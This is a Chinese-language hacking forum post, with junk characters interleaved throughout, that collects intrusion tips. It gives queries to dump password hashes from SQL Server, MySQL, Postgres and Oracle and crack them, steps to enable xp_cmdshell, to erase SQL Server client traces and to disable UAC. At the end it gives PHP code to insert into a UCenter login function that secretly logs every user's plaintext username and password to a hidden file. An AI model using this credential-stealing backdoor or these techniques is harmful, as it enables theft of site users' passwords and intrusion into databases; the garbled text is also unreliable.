" ~2 j. V* z" @ \, F7 P
; `/ M3 N/ _( z. M各种类型数据库抓HASH破解最高权限密码!
- ~+ ~% Y7 `/ }" n$ E' s1.sql server2000
% s6 @( T4 F) L, Z4 VSELECT password from master.dbo.sysxlogins where name='sa'3 t9 c3 w. ]& [8 G, k' s+ p
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, t$ }; P3 J O5 y/ M) @
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A9 {+ l f8 x9 x* F. Q* z4 ?
! [' [9 n! W) R' o \" U. H9 R
0×0100- constant header
" q; O7 M" ], w7 a$ Y34767D5C- salt
) ^" e6 x3 Z' J! V0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2 ?; ^) [1 O P2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash$ Y# E; w2 V" Z9 O
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash7 p- z% p& W+ S4 o* Y8 o, s# @+ H( Z- k
SQL server 2005:-. {8 S/ x) B; h' F7 L
SELECT password_hash FROM sys.sql_logins where name='sa'
5 P8 \( p- p0 L6 l+ N/ d/ p, q# a0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F* T& h/ T3 v7 }. M! x: Q+ R
0×0100- constant header
$ e4 X* m& P9 u5 e( t993BF231-salt
2 i1 m- R8 C) x- _- g5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash2 ^" c/ I4 m ^
crack case sensitive hash in cain, try brute force and dictionary based attacks.7 U$ h' e& t" n N& u; d* w% l8 L
$ }+ x+ ^ \: n
update:- following bernardo’s comments:-. t- L: h" M( F4 }* P
use function fn_varbintohexstr() to cast password in a hex string.& w' k+ B, f: ~. L8 |, m o
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins1 F# {; s4 y& y: m- V b* L9 d0 J
, F" E, a( Z3 tMYSQL:-
) G+ h& {7 h8 [3 |
! D; W5 p2 p N/ R( WIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
4 L' L9 ^ I! [. X7 z8 L/ }
: J; s& V/ S6 ^5 Q! Q# w$ N$ O*mysql < 4.1* d) c- D l7 ~7 \/ w( d A& w
6 X; F/ H: }3 l1 f, V {mysql> SELECT PASSWORD(‘mypass’);
2 F4 r! U9 T) {- E% V: \; F9 ?+——————–+
5 y; T& @+ h* M+ b( f; s| PASSWORD(‘mypass’) |
! I5 `# h, E- B0 a/ K- g8 r; B+——————–+
) m" Y$ ]6 C( O' h7 ^| 6f8c114b58f2ce9e |( x' H. M4 n3 Y1 i3 m' O
+——————–+
; p5 `+ L) d8 r" @; S. y6 w& J+ {8 N4 n7 y; v
*mysql >=4.1* B6 p5 i) [0 D& I" m
1 G+ ] X ]- B& q' s9 Xmysql> SELECT PASSWORD(‘mypass’);
. K4 C- X/ \0 e- Q1 e, B$ H+——————————————-+' A8 \5 x" N% ^1 ?
| PASSWORD(‘mypass’) |
$ z1 H3 u- j1 v# p+——————————————-+4 e3 b$ {4 b8 k8 x9 X4 s& T; b: q
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | X o/ U$ ^5 i7 n5 e
+——————————————-+
! \3 o$ J, O& z8 ^- `: S- j( ~: n" L" W6 g3 a( I9 ^: d0 y$ I+ D$ x$ I
Select user, password from mysql.user1 c4 C/ ?5 r# t- O9 ~* E {
The hashes can be cracked in ‘cain and abel’* w1 n( z0 s G4 f5 y( @$ D/ K
" Z0 K z+ i/ n5 x1 w( [5 V
Postgres:-* k0 F# l. E3 M/ F) n+ M0 B
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
) V3 m/ f2 H8 u/ o$ `5 P/ G b) L% Yselect usename, passwd from pg_shadow;
, B/ m8 k# @( `usename | passwd
, ? o* n! g- e% `0 c/ u: M2 u* F——————+————————————-& h' N/ L' ]: y( G
testuser | md5fabb6d7172aadfda4753bf0507ed4396
# ~; t3 x0 i+ g: m5 \$ r" D6 suse mdcrack to crack these hashes:-
6 H1 K# Q- i! l& X' k) l" t$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
" X1 J) U" e' Z/ a' l. M R' c7 K% e8 y# E9 W
Oracle:-
( G4 Z0 _9 d) Z7 n: J& Tselect name, password, spare4 from sys.user$
* H8 d+ E n$ t1 X+ o/ {hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 t* M2 |. Y1 ]4 y5 ?More on Oracle later, i am a bit bored….
! L! [+ c5 X: H$ ?0 c5 E' M$ E: V& l2 w/ O
9 F) \, Y# @( N4 X+ R1 _! J/ D5 A! |" ^在sql server2005/2008中开启xp_cmdshell& j7 S8 W. U* S5 t, c3 F b
-- To allow advanced options to be changed.6 Y' |( d! v" v# q4 h
EXEC sp_configure 'show advanced options', 1, K& @- J5 \7 c z$ n/ [# S- s
GO
* o3 M# a& w+ k$ j-- To update the currently configured value for advanced options.: D. k: Z4 V O8 C
RECONFIGURE
. n h2 L2 l6 p; f5 u" CGO% F' @$ p! c, ~, [0 G7 i. [
-- To enable the feature.
- c% D: U& }7 N( K# l+ n) UEXEC sp_configure 'xp_cmdshell', 1, h9 b3 ]0 i/ Q: Q
GO
( L* ~' _% u+ Q0 s$ Z-- To update the currently configured value for this feature.
0 N/ [7 E8 m. p! ]) m6 x0 c: jRECONFIGURE4 Q, @7 b- P4 n5 j0 y9 H j; B
GO& ?9 ?* `. I1 z: h1 }
SQL 2008 server日志清除,在清楚前一定要备份。
, H) w+ G Y" Z! A( q& f( |4 e; `如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
3 j8 V% m' b, i4 oX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin/ ]0 v. a5 {0 t/ @4 ?
8 q" f4 z3 y1 m( O/ H! x对于SQL Server 2008以前的版本:9 A0 T# p: V; d5 ?
SQL Server 2005:1 T& z. w6 h* v1 h
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ F6 M" R _$ N
SQL Server 2000:3 M: t- ?" }7 ^$ }, d1 ]
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
v+ {6 {4 w5 E; K' v: l7 U8 F3 N+ R6 ]; P, Z' i* D/ R& f
本帖最后由 simeon 于 2013-1-3 09:51 编辑! k& r! o6 F- b
" ?2 M' U/ O2 w! j5 g; M
f; \. L* {) K+ Y* J
windows 2008 文件权限修改
( i* J: A j& H8 }4 P' ^ Z7 m1 i5 k1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx/ n$ m0 M+ `2 O" q
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
1 Y; R9 \% _5 \ }. |5 V$ [" G7 U一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
' l: o& D) n2 h, F6 O7 [3 \) |* u! X/ b8 ~* @
Windows Registry Editor Version 5.00
' E( t$ x4 t0 ?9 Q3 ~# L! K7 g[HKEY_CLASSES_ROOT\*\shell\runas]3 v; f: Q: V3 m
@="管理员取得所有权", g8 C3 Q; ?! W& v1 U: S" [0 l7 I
"NoWorkingDirectory"=""$ K4 {2 X. a9 c! k* D
[HKEY_CLASSES_ROOT\*\shell\runas\command]) v( p0 _! t; r( g: h
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 ~* K+ H4 H& W ?/ J7 j) R"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( r2 Y, `4 u( L* O# }, f5 c
[HKEY_CLASSES_ROOT\exefile\shell\runas2]! s) Z- f/ p3 p; L5 B! [
@="管理员取得所有权"8 Y! M" \0 X2 B, @6 n$ h' D/ {
"NoWorkingDirectory"=""- ?$ l# m5 V M6 }1 U
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
# Z( T# y3 J, R' [, _; S: b$ \@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" E4 t# b% e( e6 J0 q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# [- a1 ~; s' w% }1 T. |! `, L: T. ?1 i# P$ @' }
[HKEY_CLASSES_ROOT\Directory\shell\runas] _# _1 F! X5 ]2 k$ s( l" v
@="管理员取得所有权"( ?# D" K3 `( u7 ~% L
"NoWorkingDirectory"=""
$ f2 W" o2 N6 e) b ][HKEY_CLASSES_ROOT\Directory\shell\runas\command]/ L. M, C' N. b8 J8 {
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"' B) z h8 E& m# s
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 \9 z, f2 P7 W# m+ ?7 s% `
) E: \$ f/ L8 X, ^( p/ {. K5 S# [6 U/ ~( \7 i- ]* C5 b
win7右键“管理员取得所有权”.reg导入9 g. R' {2 E: Z
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
( z! c2 D/ Q- n# W1、C:\Windows这个路径的“notepad.exe”不需要替换
$ W" z& _. `2 j V* `2、C:\Windows\System32这个路径的“notepad.exe”不需要替换: B9 b. Z4 _/ y6 e+ m
3、四个“notepad.exe.mui”不要管7 Z2 y. m) Z# W8 `
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
7 _! \+ B; q) v! W4 _; A- zC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
- ?+ L. U. o8 u) @3 a& x替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,% E1 w0 k- R# R- D& Y
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。. D0 r* z" D; t
windows 2008中关闭安全策略:
8 z, d* v' y+ r( b1 creg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3 R# S0 F3 T, `) X [修改uc_client目录下的client.php 在
/ t1 C# F0 R' _ d. E, Efunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
- B# n( d( T! a2 I. J下加入如上代码,在网站./data/cache/目录下自动生成csslog.php- H3 T @- U) E6 d, E
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw4 C) [% |$ B1 y! f; U7 `' R; Q: q
if(getenv('HTTP_CLIENT_IP')) {
5 P9 r* d7 b5 c: ^$onlineip = getenv('HTTP_CLIENT_IP');
" |# K# v6 n" n( m( ]7 H% d} elseif(getenv('HTTP_X_FORWARDED_FOR')) {- K T3 f; m4 b) p3 f) N! f
$onlineip = getenv('HTTP_X_FORWARDED_FOR');1 J: ]5 P' W# ~- G* P
} elseif(getenv('REMOTE_ADDR')) {; T+ `1 `, @/ ~0 T) e3 X. Z" s
$onlineip = getenv('REMOTE_ADDR');
0 @" r* ^0 D- r4 Z, C8 M} else {7 W4 \. h, }2 J3 }
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];2 `; g& d& ]3 ]- E! F6 J
}
5 N: G4 W) z4 o $showtime=date("Y-m-d H:i:s");, F. { ?, N* @/ M
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";, Z* j- I1 R! i6 C6 Y
$handle=fopen('./data/cache/csslog.php','a+');" @: j" _ s0 }) J, S
$write=fwrite($handle,$record); |